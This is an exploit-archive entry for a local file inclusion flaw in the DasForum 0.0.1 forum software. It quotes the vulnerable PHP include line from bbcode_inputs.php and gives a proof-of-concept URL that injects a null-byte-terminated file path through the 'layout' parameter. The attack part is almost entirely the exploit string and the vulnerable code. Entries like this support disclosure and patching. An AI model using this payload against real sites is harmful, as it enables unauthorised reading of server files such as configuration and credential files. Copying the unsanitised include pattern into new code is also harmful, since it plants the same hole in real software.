id: 10681
date: 01/16/2010
title: DasForum (layout) Local File Inclusion Exploit
author: cr4wl3r
cves: 

==============================================
DasForum (layout) Local File Inclusion Exploit
==============================================

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |   DasForum (layout) Local File Inclusion Exploit   |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------
[!] Discovered: cr4wl3r
[!] Download: http://mirror.vocabbuilder.net/savannah/dasforum/
[!] Version: 0.0.1
[!] Date: 15.01.2010
[!] Remote: yes
 
 
[!] Vulnerability Code [bbcode_inputs.php] :
 
    include("layouts/".$layout."/bbcode_inputs.php");
 
 
[!] PoC:
 
    [DasForum_path]/bbcode_inputs.php?layout=[LFI%00]



#  0day.today [2023-03-26]  #